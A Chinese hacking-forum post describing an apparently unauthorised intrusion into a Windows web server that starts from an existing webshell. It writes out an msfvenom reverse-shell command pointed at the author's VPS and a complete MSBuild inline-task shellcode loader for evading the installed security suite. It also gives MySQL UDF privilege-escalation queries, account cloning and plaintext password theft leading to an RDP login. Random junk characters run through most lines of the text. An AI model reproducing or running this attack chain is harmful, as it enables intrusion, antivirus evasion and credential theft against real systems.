, Y* ^0 N `9 m V" s 0x00 前言
平常自己挺喜欢折腾的,有时候遇到一个好的突破点会折腾它个几天几夜,刚刚忙完护网,正准备修整几天,突然有人朋友联系我说有个任务需要搞进去,问我能行不能行,后来得知是已经拿到webshell了,通过一番努力便有了下文。
0x01 前期的信息刺探** - c; r, e m, g
9 C3 t; d; F) ]. |+ T 首先拿到webshell,发现phpshell只能访问shell所在目录,连网站根目录都跨不过去如图: ( ^4 r+ a" j5 B0 y: T r$ y8 F
0 Z M3 {0 |& o8 y

7 H8 J8 w" M( S3 Q* f
c盘d盘根目录就更别提跨过去了,随之执行一下命令看看,如图:
whoami等简单的命令可以跑起来,tasklist发现了 某某安全套装等安全防护进程进程,om my god,刺激,就喜欢这种各种需要绕的环境,既然能跑起命令来那就上免杀的exp来试着提一下(通过rar解压方法突破某防护程序上传),如图:
, g8 K1 `! b) J, `- `1 J

; y! Q- c% b/ _9 M. Y
经过测试发现,不管把exp放哪个目录都提示拒绝访问,特别是net命令都禁止执行,越发让我感觉是安装安全防护程序的缘故;
0x02 深入 & F% Z6 [5 G$ V
9 g, J% K) ^/ m: [2 H. J6 ?$ E' H r/ `& I: v) V4 q4 s
通过msbuild.exe白名单方式运行metasploit payload绕过某安全程序调出w3wp.exe进程
7 e( w3 I( \8 W. v. |
在webshell执行直接执行rar程序一直提示拒绝访问如图: & G, W6 g* i" h' p4 T: A

0 P* H5 j' r: i
在实际做测试的时候发现windows下用shell反弹个cmdshell回来执行一些命令要比在webshell好许多,看官请看

成功将我们想要的exe程序解压到指定目录,webshell下是没法cd到rar目录的,现在能正常上传exe,我们看能不能想办法让咱们的msf不要闲下来,之前考虑用 php/meterpreter/reverse_tcp这个payload上线弹回meterpreter,但是弹回来什么权限也没,连ps进程命令都没法显示,这时候就想到了使用msbuild.exe白名单方式运行metasploit payload绕过某防护程序让msf上线,于是就开始动手,具体如下:
首先使用msf生成一个c#的payload , g: I" M& o4 T
msfvenom -p windows/meterpreter/reverse_tcp lhost=vpsip lport=443 -f csharp
3 e6 n) R3 W1 `& T
代码如下: 3 U9 j& Y3 h. ]2 K* \) Y
byte[] buf = new byte[179779] {
; ^) e: |' K0 h, E( }8 ?& L
8 e" o7 Q$ [6 W5 S ! j) t' Q- z& _* |3 Q0 z% g$ i g
$ q6 g2 Z7 @; T. z6 ~/ ` 0x8b,0x71,0x1c,0x85,0xf6,0x74,0x58,0x33,0xff,0x39,0x79,0x20,0x74,0x51,0x39, , S0 _! P: d6 R! m
0x79,0x24,0x74,0x4c,0x89,0x79,0x14,0x89,0x79,0x08,0x89,0x79,0x18,0xc7,0x41,
; K# z7 O& B5 k7 n+ e 0x2c,0x02,0x00,0x00,0x00,0x8b,0x46,0x08,0x89,0x7e,0x14,0x89,0x46,0x10,0x39, 4 z" F: X4 m3 X3 B6 g2 @
0 s3 O" \/ q9 I$ cP( Y6 i# f* j- A+ d 0x7e,0x18,0x7d,0x03,0x89,0x7e,0x18,0x39,0x7e,0x18,0x6a,0x2a,0x58,0x6a,0x71,
+ Y# E! _" j1 D/ T% E% Y+ t' {0x5a,0x0f,0x45,0xc2,0x89,0x46,0x04,0xc7,0x41,0x30,0x01,0x00,0x00,0x00,0x56,
6 G" p3 T; k5 m( F: D 0x89,0x7e,0x20,0xe8,0x88,0x07,0x00,0x00,0x56,0xe8,0x8a,0x15,0x00,0x00,0x59, / G) ?3 ^+ P) p
0 e; ?& @3 `6 b6 \2 d/ k& H; ?2 p6 d7 h 0x59,0x33,0xc0,0xeb,0x03,0x6a,0xfe,0x58,0x5f,0x5e,0x5d,0xc3,0x55,0x8b,0xec,
" f0 Z* @/ F. W* s2 ^ 0x8b,0x4d,0x08,0x33,0xd2,0x56,0x57,0x85,0xc9,0x0f,0x84,0x8d,0x00,0x00,0x00,
: m x; J" d$ [7 p8 z5 @ 0x8b,0x71,0x1c,0x85,0xf6,0x0f,0x84,0x82,0x00,0x00,0x00,0x8b,0x7d,0x0c,0x83,
8 B( g0 |3 }: X/ ~1 {" f3 m" L' Y6 ` 0xff,0xff,0x6a,0x06,0x58,0x0f,0x44,0xf8,0x83,0xff,0x09,0x77,0x71,0x83,0x7d,
' j. O$ U& l) o% q1 P 0x10,0x02,0x77,0x6b,0x6b,0x46,0x7c,0x0c,0x53,0x6b,0xdf,0x0c,0x8b,0x80,0x00,
% e- y. F- _, ^4 f. `0x9d,0x02,0x10,0x3b,0x83,0x00,0x9d,0x02,0x10,0x74,0x11,0x39,0x51,0x08,0x74, ' g" v8 _* d! D$ L* b, I' j: w
& t" S* g+ S( }( p 0x0c,0x6a,0x01,0x51,0xe8,0x2b,0xf6,0xff,0xff,0x59,0x59,0x8b,0xd0,0x39,0x7e,
2 z2 U1 d. |5 D% u0 {# g8 s) d2 b; h# w+ v' L- C 0x7c,0x74,0x31。。。代码太长省略。。。
$ W1 E, r# `4 L- z7 b9 Cr0 L; `* g9 D: e& r };
/ Q1 _: L/ l( J$ g$ h/ d& k- u" ]5 ^# Z. [& z6 a1 [# _* h. [
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
; q9 t K8 {7 F) ?8 ?' C) }$ ~9 F T) b# X- h. ?' {5 u Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero; : x" }: O4 b+ J7 v7 ?
- `, ?5 Q* b- l8 w. B: t UInt32 threadId = 0; - F% V) M7 z$ Y+ B
IntPtr pinfo = IntPtr.Zero;
) X/ d* s/ c2 [2 y2 w& G/ D- d) ?! U2 L: T$ d hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
4 c4 K, @6 W: A; iWaitForSingleObject(hThread, 0xFFFFFFFF);
7 q/ W% O( O5 J4 m: B+ P3 k p3 x9 i6 i0 o return true; & a. z. |: [3 M3 V
% R% _- T8 |& z$ ^# v9 L- T" f* A } & F! H# J" W( A2 y7 B1 z
( n- S5 Y5 b1 q" Q: T2 }8 ?7 K5 @) M) q: x, J4 \7 K* B% [' s }
]]>
4 j! D. \6 I3 I</Code>
/ G& W3 [! |0 v5 l </Task> ( C3 c, h0 C5 x+ \6 g& N
</UsingTask>
" N7 i: ~9 M$ o7 S- _6 M2 Z( k1 @8 j g. W A. z7 X6 t </Project> % j5 t8 W2 B2 F, q( e# O) F; x
5 J8 {2 Q! U- ]) l2 P/ i 用msf生产的代码替换原始代码的内容,这是原始payload如下:
0 i% n u: h, p( X <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
" R) o9 u- j1 q7 G<!-- This inline task executes shellcode. -->
& n) i! k& m# ]& i" B<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj --> 1 I! r' j9 d5 h q2 F; z
<!-- Save This File And Execute The Above Command -->
0 Z, M0 ?4 \; z9 E% s8 S<!-- Author: Casey Smith, Twitter: @subTee --> ' ?6 z2 r- |' o. H
. L8 z U3 t: e$ a* s! q' H9 J7 R/ k) L4 i- Z% A& y4 L# E/ R <!-- License: BSD 3-Clause --> 8 N" v# H( ~1 v8 {6 y6 @( W- @( v. o
& c5 E6 Y( ^2 S* \; \; D3 i$ Z. u0 R y* B <Target Name="Hello"> 0 E' A; _* E. z6 C7 ]4 L
. {3 w/ e' }: q# h% D0 P% Q' E6 r. ^9 Z- K. Z1 N <ClassExample /> % e6 x4 t% B7 u/ d2 M
5 `& x" i" B! H$ l0 U- N+ F6 r </Target>
9 J& N. B: w1 f: D2 r2 _ <UsingTask ( L" ?7 ?7 j) Y' P: Q. L
% |3 R8 \4 g6 e6 ~! w" OTaskName="ClassExample" + F/ j& r' u$ m# Y% U4 k
3 I# f# f3 ?5 m/ z TaskFactory="CodeTaskFactory" ( }. R' F( c; h. q
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > / R( V3 [6 |8 c
1 Q3 x4 ]( F8 F A! X7 T+ E2 H6 Q9 b3 k+ R2 x, l <Task>
1 A3 ]3 n7 f+ Z2 n 5 T9 o- z& n* B7 G7 c8 o7 T8 H
! `+ N; T6 k( o7 K: x* U& W. D- U& [ <Code Type="Class" Language="cs">
/ d: t9 a# j. S" _, v: S% _ G' D T9 i/ }: S: O <![CDATA[
+ p# u5 F3 o" k$ N$ h: O* U% J+ musing System;
. b/ n* V/ f. L* Q using System.Runtime.InteropServices;
2 S0 ]9 f. k: y2 [5 c" Eusing Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask 6 _: n2 c( X# @; e4 [2 H- C( Z
{ . d/ X( F8 p0 ~. m" e! N0 {/ U# G
, Z( Y' K* D! x5 d J4 z+ L4 D, \1 G, _8 s6 i7 S0 C private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
: \8 L& u$ z+ q6 D. Q' ^[DllImport("kernel32")] 4 W0 H: S7 {5 G M& _$ W
$ h, c8 H! y ]( w: i private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect); ) ~8 A" q( c& Z o# a
[DllImport("kernel32")] : s1 T' O& m/ d, {9 n
' s4 ]5 h. k2 l2 c private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
O/ p. {6 X5 @/ }4 f9 i/ ?% i2 b* [ UInt32 dwStackSize,
UInt32 lpStartAddress,
, A- K6 n, V* k1 Z. p! jIntPtr param,
8 O7 V7 e9 l. `$ H( n( c UInt32 dwCreationFlags,
( ~, j1 F( j1 Y ref UInt32 lpThreadId " X; G0 e- M& ?, ~$ M% x
); + K' X( d5 U% ^$ d0 ]% I
4 p$ H8 L7 }+ z% c% w3 O* O8 z' T4 w1 D [DllImport("kernel32")]
) V8 e: a+ O, l, K) Uprivate static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
) W8 n' X, [8 \ S: e) \UInt32 dwMilliseconds
. }8 t7 H( m- o/ \ );
& c3 U2 q/ L, N( q8 c$ q1 h' upublic override bool Execute() 6 ]) L; M$ E/ c& F! `; m& w% s
3 O% [7 {* N/ h% t; y { # F/ O/ K) M, a2 i9 k6 s. E. o, k" J+ i
byte[] shellcode = new byte[179779] {
2 r; d0 P/ f6 A这里是msf生成的c# shellcode,代码太长省略
( s$ k5 J& ^) u; c5 G1 K5 R: J9 x* U9 X: f& {* j6 h E4 ~% x }; 8 |& [8 l1 }1 U+ o* a
' J, I* i3 e2 _' n4 A9 _5 Q: i2 J; Y. j& x0 P/ u UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, 1 N7 Z1 q$ e- W% M: v
6 I0 p, m& W* k1 y: B$ p( A MEM_COMMIT, PAGE_EXECUTE_READWRITE); " o" o: S% ~' E6 X" n. ]. @ k
4 n) Y" D$ J& c" r' {8 ~( n+ nMarshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); 6 I4 o b- H) x$ X& n
; p+ |1 K* P4 s3 n+ ]' M5 ]) \, C- M. ]+ n+ n IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
3 C( s$ w* ]- z4 C2 t. Q, G+ H, pIntPtr pinfo = IntPtr.Zero; 0 I/ p6 z: o8 i, f
- u! @- o( [( J, j' y) q# e2 k6 D, a# @- S! |" x hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
2 t7 [/ C' C- |) I4 a( r- cWaitForSingleObject(hThread, 0xFFFFFFFF);
# F3 q) |; C7 |/ [1 {return true; # @$ e, r8 u9 S8 y0 O
} 0 ?& `* G4 F) D1 W( i7 {0 p
1 T! r/ F5 v8 B7 `* J2 C }
; ^1 r- c# l% ]+ a# I/ J) o]]>
</Code>
0 \- r; c8 U+ [7 g2 f </Task>
5 X; g8 d, h, Y/ i9 r% _. }2 [" Y- J' B </UsingTask> 2 u2 @5 R' k U# g6 w7 T
</Project> 8 E8 w+ S+ Q! P; a
需要注意的是必须改成shellcode如图:
: A- V; n4 \" }) B6 t/ H( p

然后上传到web目录,nc反弹继续执行如下命令: $ _# n' ^3 o( q/ b3 E( k
, w4 [, o- |1 S! M7 y8 p cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\ / L) F1 E9 O* z! Q; [
msbuild.exe D:\1\1111.com\uploadfile\19200\443.csproj ; e4 b& m5 S; f+ X- E: r" `
( |9 R. ?6 Y6 @2 e3 a5 i
这时候监听好的msf就会返回一个meterpreter如图:

试着在shell和meterpreter下执行exp都提示拒绝访问,如图:
1 s3 l2 ]! V P$ f2 E6 c4 j

但是测试upload上传命令确实是成功调出w3wp.exe 进程,经过一番努力无果,只好换思路解决。 . a% Y4 Q$ R+ X$ N* d( v3 ]# d6 R
. o4 q E- b R* D" k 0x03 MySQL udf提权
* R( `3 ~& V) u% L. y% c$ w6 x. O; u7 ` 通过上面的一些测试,已经无望了,这时候就想着用其他办法,经过测试发现网站支持asp,就上传了一个aspshell,各种翻目录各种测试,终于在网站的二级目录数据库配置文件发现了mysql root密码,OK,上传udf提权php马,在具体测试过程中发现,市面上的udf Php工具都被某安全程序被杀了,我发现把被杀的php后缀修改为csproj上传不杀了,要不然无论把被杀的php换成什么后缀名都不行,然后再通过PHP包含这个文件,就可以突破了(也不知道算不算是个某防护程序的一个bug,总之用这种办法让udf工具跑起来了),如图:
0 ^; l8 [# A3 t6 G6 _2 l2 a: V4 K" k( A' G+ }; Y7 M/ r" F

然后按常规导入dll,提示dll导入成功,创建sys_eval 函数执行命令,却又提示函数不存在如:FUNCTION mysql.sys_eval does not exist,在测试过程没少折腾,用portfwd命令转发目标3306到本地,利用sqlmap -d 上传dll提示不成功,后来用--file-write命令上传dll到system32下也失败了,但是发现上传非二进制的文件的话是成功的,后来通过查看权限证明不是权限问题如图:
+ }: d. m( T7 U" A; J" Y
select * from mysql.user where user = substring_index(user(), '@', 1) ; $ C* f$ q1 W$ l. Z# }! v! j
6 x J; M" a( X9 X2 m' x

权限都很OK,很悲催dll被禁止上传,可恶的安全防护呀,通过查询发现几个自定义函数,如图: % \) B4 O W" p( ?

发现udf.dll已经被占坑了,我们查询一下看看
select hex(load_file('c:/windows/system32/udf.dll'));如图:

我们利用php环境把它转成dll,代码如下: ! J$ ]* t7 C, B
<?php 7 A3 \1 t6 ?1 f# z9 Q
% s. C2 Y! I. {' b9 R7 s7 y0 k/ J% D. R echo file_put_contents('udf.dll',hex2bin("这里为sql查询出来的值"));
- N# V9 R- Z+ [: V8 Q$ ` ?> 9 ~# x u6 R$ j' I- b
s1 w1 q0 L8 F! j3 ^" f 成功把它还原成dll文件,用c32am打开看一下他的用法如图: 2 m4 z4 [% m4 s# F
% }- _4 _1 }. E$ B: L, t# l: K7 E' B: P: L$ f3 n5 P

看看这个shell函数的用法,

9 {7 B8 o# F- l' O
正好和dll里面的信息一致,但是在测试的过程中发现cmd那个参数用法没法执行命令会卡死,后来试了exec,select shell('exec','whoami');,如图: + H3 C& m2 l% ]( `' Q+ J
$ ^! c R8 C) a- F# }

说明这个exec可以绕过安全防护执行命令,接下来的测试中打算使用msf来操作,于是给目录上传了个免杀的msf工具,过全世界所有的杀毒用法 msf vpsip 443,但是监听好的msf一直没返回来meterpreter,后来没办法又用白名单执行命令成功上线(奇怪的还在后面)命令如下:select shell('exec','C:/Windows/Microsoft.NET/Framework/v4.0.30319/msbuild.exe D://1//xxoo.com//uploadfile//19200//443.csproj');注意斜杠问题否则执行出错

但是奇怪的是已经成了system权限却没办法shell,这也正是这个目标奇葩的地方,执行shell卡死,后来ps了一下进程发现administrator的进程migrate pid,然后再执行shell成功执行,并且也可以执行net user 等命令如图:
很OK,直接net user添加账号肯定不行,利用userclone克隆添加账号密码,账号添加成功,但是加入到管理员组失败,手里有杀某防护程序的神器,但是似乎用不上,杀完需要重启动静太大,OK,这时候发现administrator在线直接上传getpassword64免杀版抓明文密码,得到administrator的明文密码,试着用msf模块抓一下密码,如下:
: R. X6 k3 {' F& k" T: k' a

没有成功,因为之前也踩点发现3389没有被某防护程序加入主机名或者ip认证,可以正常登录,所以也不涉及绕过认证登录的问题。登录如图:
: A. O! C1 F P# Y' S 渗透到此就结束了。 ( z- ~4 k5 X0 \4 z4 I$ K: I3 V w+ b
8 N- _& ?+ x- _2 O 0x04另一个案例绕做组策略限制执行命令 # Q9 ~5 U/ i/ i3 p/ f. d v/ w
6 n7 x N3 _ z' Q) Z) g u9 u( O/ Y8 P* G+ ]6 c. v 主要还是白名单绕过执行程序及配合udf提权,碰到前人留下的udf后门直接提到system,剩下就是一顿乱折腾,不过也不白折腾,摸着石头过河没什么不好;第一次在先知改版后写文章,文章排版之类的还是不太熟悉,可能写的不尽人意,还是请多包涵。。。。。这里要感谢先知V师傅,莫须有等好兄弟的大力支持,一晚上陪我熬夜。。。
/ g4 h+ f& E: k# e 命令跑起来了,最起码遇到不能执行命令的时候用白名单执行可以继续开展下一步工作,或者利用msf的load powershell也行继续搞,哈哈 8 [: k, `; ~6 j8 l% Z; U
) a* L( ~6 W5 B+ r8 s/ t( b* u$ } @+ A& I. Q( a/ G
$ {* K- `( N1 G& }5 A4 \: Q l( y1 @9 E9 }6 P- A: { 黑客是一种精神,虽然我不是黑客,但是我崇拜这种精神,什么精神?就是永不言败,勇于突破,敢于挑战,崇尚自由的这种精神或者神经,值得各行各业的人学习。(自从学了黑客,人也变得踏实了,也不虚上跳下,也不让家里人觉得这个人不成熟、不靠谱,总之学黑客,得永生,黑客大法好!!!加油兄弟们!) " }0 p9 o b7 f
3 d( H7 O, j; v- k# o" @
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |